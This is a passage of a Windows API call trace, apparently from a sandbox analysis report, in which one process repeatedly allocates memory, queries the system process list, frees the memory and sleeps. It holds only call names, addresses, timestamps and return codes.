returned 0x0 [0268.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.281] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.290] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.347] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.453] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0268.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0268.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0268.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0268.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0268.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0268.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0268.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 